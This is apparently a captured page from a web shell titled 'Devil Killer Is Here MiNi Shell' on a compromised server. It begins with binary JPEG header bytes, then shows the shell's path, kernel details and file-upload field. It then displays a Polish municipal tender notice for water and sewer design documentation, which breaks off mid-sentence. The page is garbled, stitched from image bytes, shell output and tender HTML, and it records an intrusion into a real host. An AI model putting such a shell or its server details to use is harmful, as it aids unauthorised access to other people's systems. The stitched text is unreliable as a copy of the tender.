JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250811/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250811/0037104901-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Opracowanie dokumentacji projektowej na budowę sieci wodociągowej i kanalizacji sanitarnej na terenie Gminy Sokołów Małopolski </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA SOKOŁÓW MAŁOPOLSKI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 690582134</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sokołów Małopolski</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">36-050</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">177729019</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ugim@sokolow-mlp.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.sokolow-mlp.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Opracowanie dokumentacji projektowej na budowę sieci wodociągowej i kanalizacji sanitarnej na terenie Gminy Sokołów Małopolski </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e71cd1c2-edd3-4734-b47d-3b569bad7e0d</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00371049</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-08-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00027299/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.26 Dokumentacja projektowa - Budowa wodociągu fi 250 przy ul. Lubelskiej w Sokołowie Małopolskim</p> <p class="mb-0">1.3.27 Opracowanie dokumentacji projektowej budowy sieci wodociągowej w Sokołowie Małopolskim z terenów osiedla Słoneczne II ( ul. Tęczowa i ul. Głogowska)</p> <p class="mb-0">1.3.30 Dokumentacja projektowa- Budowa kanalizacji sanitarnej w Sokołowie rejon Południowy</p> <p class="mb-0">1.3.31 Dokumentacja projektowa- Budowa kanalizacji sanitarnej- rejon Północny Sokołowa</p> <p class="mb-0">1.3.32 Dokumentacja projektowa - Budowa kanalizacji sanitarnej w rejonie ul. Głogowskiej w Sokołowie Małopolskim</p> <p class="mb-0">1.3.33 Dokumentacja projektowa - Budowa kanalizacji do terenów przemysłowych przy ul. Lubelskiej</p> <p class="mb-0">1.3.36 Dokumentacja projektowa - Budowa kanalizacji sanitarnej do działki 1450/5 i sąsiednich w Trzebusce</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-e71cd1c2-edd3-4734-b47d-3b569bad7e0d <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia publicznego komunikacja między<br/>Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy<br/>e-Zamówienia, która jest dostępna pod adresem<br/>https://ezamowienia.gov.pl.<br/>Zamawiający dopuszcza również komunikację za pomocą poczty elektronicznej Zamawiającego na adres e- mail: ugim@sokolow-mlp.pl - pojemność jednej wiadomości na skrzynce - do 50 MB (nie dotyczy składania ofert).<br/>W tytule e-mail należy wpisać numer<br/>ogłoszenia (BZP lub ID postępowania).<br/>Wiadomości przekazywane za pomocą poczty elektronicznej powinny w sposób jednoznaczny wskazywać nr ogłoszenia lub ID postępowania oraz dane identyfikujące Wykonawcę.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca&#34; na Platformie e- Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-<br/>Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone<br/>w zakładce „Centrum Pomocy&#34;.<br/>2. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania.<br/>3. Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, przekazywane w postępowaniu sporządza się w postaci elektronicznej.<br/>5. Jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące<br/>tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (Dz.U. z<br/>2022 r., poz.1233) Wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio<br/>oznaczonym pliku, wraz z jednoczesnym zaznaczeniem w nazwie pliku „Dokument stanowiący tajemnicę przedsiębiorstwa&#34;.<br/>6. Komunikacja w postępowaniu, z wyłączeniem składania ofert/wniosków<br/>o dopuszczenie do udziału w postępowaniu, odbywa się<br/>drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze&#34; („Formularze do<br/>komunikacji&#34;). Za pośrednictwem „Formularzy do komunikacji&#34; odbywa się w szczególności przekazywanie wezwań i zawiadomień,<br/>zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej<br/>wiadomości (przycisk „dodaj załącznik&#34;).<br/>W przypadku załączników, które są zgodnie z ustawą P.z.p lub rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla<br/>dokumentów elektronicznych opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym,<br/>mogą być opatrzone, zgodnie z wyborem wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie zamówienia/podmiotu<br/>udostępniającego zasoby, podpisem zewnętrznym lub wewnętrznym.<br/>W zależności od rodzaju podpisu i jego typu (zewnętrzny,<br/>wewnętrzny) dodaje się do przesyłanej wiadomości uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ<br/>zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny).<br/>7. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji&#34;<br/>w pełnym zakresie wymaga posiadania konta<br/>„Wykonawcy&#34; na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do<br/>komunikacji&#34; służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta<br/>uproszczonego na Platformie e - Zamówienia.<br/>8. Wszystkie wysłane i odebrane w postępowaniu przez Wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie<br/>postępowania w zakładce „Komunikacja&#34;.<br/>9. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji&#34; wynosi 150 MB (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza).<br/>10.Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz<br/>informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>11. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą<br/>skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (32) 77 88 999 lub drogą elektroniczną poprzez formularz<br/>udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem&#34;.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1) Administratorem danych osobowych zawartych w ofercie oraz we wszystkich innych dokumentach składanych przez Wykonawcę w postępowaniu o udzielenie niniejszego zamówienia publicznego jest Burmistrz Gminy<br/>i Miasta Sokołów Małopolski, ul. Rynek 1, 36-050 Sokołów Młp.<br/>Zamówienie udzielane jest w trybie podstawowym na<br/>podstawie: art. 275 pkt 1 ustawy - Usługi<br/>2) Inspektorem Ochrony Danych został wyznaczony i można się z nim skontaktować za pośrednictwem poczty elektronicznej na<br/>adres e-mail: iod@e-sokolow-mlp.pl bądź poczty tradycyjnej, kierując pismo na adres Administratora.<br/>3) Dane osobowe, o których mowa w pkt 1 przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z<br/>postępowaniem o udzielenie zamówienia publicznego wykonanie dokumentacji projektowej dla zadania, pn.:<br/>&#34;PRZEBUDOWA DROGI GMINNEJ NR 108696R GÓRNO PRZEZ LAS (UL. SOKOŁOWSKA W GÓRNIE) WRAZ Z BUDOWĄ DROGI PIESZO-ROWEROWEJ I ZATOK AUTOBUSOWYCH&#34;.<br/>sygn. RG.ZP.272.36.D.2025, prowadzonym w trybie podstawowym bez<br/>negocjacji;<br/>4) Odbiorcami ww. danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 i 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2024 r. poz. 1320), zwanej dalej<br/>Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi „ustawą Pzp.”;<br/>5) Ww. dane osobowe będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o<br/>udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, czas przechowywania obejmuje cały okres obowiązywania<br/>umowy w sprawie zamówienia publicznego;<br/>6) Obowiązek podania danych osobowych bezpośrednio dotyczących osób wymienionych w ofercie oraz we wszelkich innych<br/>dokumentach składanych przez Wykonawcę w postępowaniu o udzielenie niniejszego zamówienia publicznego jest wymogiem<br/>ustawowym określonym w przepisach ustawy, związanym z udziałem<br/>w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy;<br/>7) W odniesieniu do danych osobowych ww. osób decyzje nie będą podejmowane<br/>w sposób zautomatyzowany, stosownie do art. 22 RODO;<br/>8) Każda osoba fizyczna, której dane osobowe przekazano Zamawiającemu w ofercie lub innych dokumentach składanych przez<br/>Wykonawcę w postępowaniu o udzielenie niniejszego zamówienia publicznego posiada:<br/>a) na podstawie art. 15 RODO – prawo dostępu do danych osobowych jej dotyczących,<br/>b) na podstawie art. 16 RODO – prawo do sprostowania jej danych osobowych, przy czym skorzystanie z tego prawa nie może<br/>skutkować zmianą wyniku postępowania<br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy<br/>w zakresie niezgodnym z ustawą oraz nie może naruszać integralności protokołu oraz jego załączników,<br/>c) na podstawie art. 18 RODO – prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa<br/>w art. 18 ust. 2 RODO, tj. prawo do ograniczenia przetwarzania nie ma zastosowania<br/>w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej<br/>osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego,<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy osoba ta uzna, że przetwarzanie danych<br/>osobowych jej dotyczących narusza przepisy RODO; 32<br/>9) Żadnej osobie, której dane osobowe przekazano Zamawiającemu w ofercie lub innych dokumentach, składanych przez<br/>Wykonawcę w postępowaniu o udzielenie niniejszego zamówienia publicznego, nie przysługuje:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>c) na podstawie art. 21 RODO prawo sprzeciwu wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania jej<br/>danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RG.272.1.2025.MW</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">6</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> W ramach Zadania nr 1 należy zaprojektować około 500 m sieci wodociągowej Fi 250. Wpięcie do istniejącej sieci należy wykonać na działce o nr ew. 2182/6 oraz na działce o nr ew. 2173/12, położonych w miejscowości Sokołów Małopolski. <br/>1.	Opracowanie kompletnej dokumentacji projektowej zgodnie z wymogami obowiązującego prawa:<br/>1.1.	Opracowanie Projektu budowlanego i zagospodarowania terenu inwestycji, w tym:<br/>- Opracowanie koncepcji i uzgodnienie jej z Zamawiającym i właścicielami posesji prywatnych.<br/>- Uzyskanie niezbędnych zgód i warunków realizacji inwestycji od operatorów sieci kolidujących oraz od operatora sieci wodociągowej.<br/>- Uzyskanie zgód na wejście w teren.<br/>- Pozyskanie wypisów z MPZP, wypisów z rejestru gruntów lub innych wymaganych dokumentów.<br/>- Przygotowanie materiałów i załączników do kompletnego wniosku o uzyskanie decyzji pozwolenia wodnoprawnego lub zgłoszenia wodnoprawnego (jeżeli będzie wymagane);<br/>- Pozyskanie map do celów projektowych, na koszt Wykonawcy, w zakresie niezbędnym do opracowania dokumentacji budowlanej.<br/>- Opracowanie projektu zagospodarowania i uzgodnienie go w ramach narady ZUDP.<br/>- Uzgodnienia przeciwpożarowe – jeżeli będą wymagane przepisami prawa.<br/>- Ew. uzgodnień w zakresie melioracji.<br/>- Przygotowanie dokumentacji geologicznej, określającej warunki gruntowe oraz wodne realizacji inwestycji (jeżeli będzie wymagana).<br/>- Opracowane kompletnego projektu budowlanego (PZT), wraz z niezbędnymi opisami i załącznikami, zgodnie z wymogami prawa budowlanego, który pozwoli na skuteczne uzyskanie pozwolenia na budowę lub zgłoszenia budowy.<br/>- Przygotowywanie wszelkich wniosków o uzyskanie zgód/decyzji administracyjnych na każdym z etapów prac projektowych oraz przygotowanie wniosków o wydanie decyzji o pozwolenie na budowę lub zgłoszenia robót budowlanych do podpisu przez Zamawiającego tj. Burmistrza Gminy Sokołów Małopolski lub osób upoważnionych przez Burmistrza Gminy Sokołów Małopolski wraz z niezbędną ilością egz. wymaganą przez dany Organ/Urząd/Instytucję wraz z wymaganymi załącznikami w ilości innej wg wymagań Organu, w tym 1 egz. dla Zamawiającego;<br/>- Uzyskanie prawomocnych decyzji administracyjnych lub uzyskanie braku sprzeciwu właściwych Organów na realizację danego zakresu inwestycji.<br/>1.2.	Opracowanie Projektu technicznego, na etapie przed uzyskaniem pozwolenia na budowę, w tym:<br/>- Opracowanie wszelkich niezbędnych dodatkowych projektów, w tym narzuconych przez użytkowników i administratorów infrastruktury nadziemnej i podziemnej np. projekt zabezpieczenia czy przebudowy istniejącego uzbrojenia, doprowadzenia wymaganych sieci/budowa przyłączy do obiektów liniowych, przejścia przez drogę, lokalizacji infrastruktury w pasie drogowym itp.:<br/>•	Dokonanie niezbędnych uzgodnień i uwzględnienie ich przy projektowaniu i ewentualnym zabezpieczeniu lub przeprojektowaniu urządzeń podziemnych,<br/>•	Uzyskanie wszystkich opinii i uzgodnień wymaganych obowiązującymi przepisami;<br/>•	Opracowanie projektu odtworzenia nawierzchni (jeżeli dotyczy);<br/>•	Opracowanie STWiOR;<br/>•	Opracowanie przedmiaru robót;<br/>•	Opracowanie kosztorysu inwestorskiego;<br/>•	Sporządzenie informacji dotyczącej bezpieczeństwa i ochrony zdrowia;<br/>1.3.	Projekty winny być zaopatrzone w wykaz opracowań oraz w pisemne oświadczenie Wykonawcy, że został sporządzony zgodnie z postanowieniami umowy, powszechnie obowiązującymi w tym zakresie przepisami prawa oraz, że jest w stanie kompletnym z punktu widzenia celu, jakiemu ma służyć i nadaje się do realizacji. Wykaz opracowań oraz pisemne oświadczenie, o których mowa wyżej stanowią integralną część Projektu oraz część przedmiotu odbioru końcowego zadania. Projekt nie może zawierać niczego, co naruszałoby jakiekolwiek prawa osób trzecich w tym prawa na dobrach niematerialnych osób trzecich.<br/>1.4.	Dokumenty o których mowa w pkt. 1.2 i 1.3 winny być przygotowane w wersji papierowej w 4 egz., oraz w wersji elektronicznej w 1 egz., na nośniku pendrive, dostępne w plikach pdf . Wymaga się aby projekt budowlany w wersji elektronicznej obejmował wersję ostateczną zatwierdzoną przez Starostwo (z pieczęciami Starostwa)<br/>1.5.	STWiOR, przedmiary robót oraz kosztorysy inwestorskie winny być przygotowane w wersji papierowej w 2 egz. oraz w wersji elektronicznej w 1 egz., na nośniku pendrive, wymaga się, aby kosztorys inwestorski i przedmiar robót były przygotowane w pliku programu kosztorysowego oraz w wersjach pdf i excel. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71322200-3 - Usługi projektowania rurociągów</p> <p class="mb-0">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">77 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującym kryterium oceny ofert:<br/>Cena - 100% = 100 pkt<br/>Kryterium – cena (C): oferty będą oceniane według poniższego wzoru:<br/>C=(Najniższa całkowita wartość brutto spośród oferty)/(Całkowita wartość brutto badanej oferty) x 100 x 100 %= ...pkt<br/>Najkorzystniejsza oferta w kryterium cena, wg wzoru może uzyskać maksymalnie 100 punktów. Przyznane ilości punktów zostaną zaokrąglone do 2 miejsc po przecinku.<br/>Za najkorzystniejszą ofertę zostanie uznana oferta, która otrzyma najwyższą liczę punktów.<br/>Maksymalna łączna liczba punktów jaką możne uzyskać Wykonawca wynosi – 100 pkt.<br/>Zamawiający stosuje zaokrąglenie wyników do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> W ramach Zadania nr 2 należy zaprojektować budowę sieci kanalizacji sanitarnej grawitacyjnej z wpięciem do istniejącej sieci na działce nr ewid.2182/7 w Sokołowie Małopolskim oraz doprowadzenie sieci do działki nr ew. 5262/5 w Sokołowie Małopolskim. Projekt powinien uwzględnić możliwość podpięcia działek przez które przebiega sieć i sąsiednich w razie potrzeby 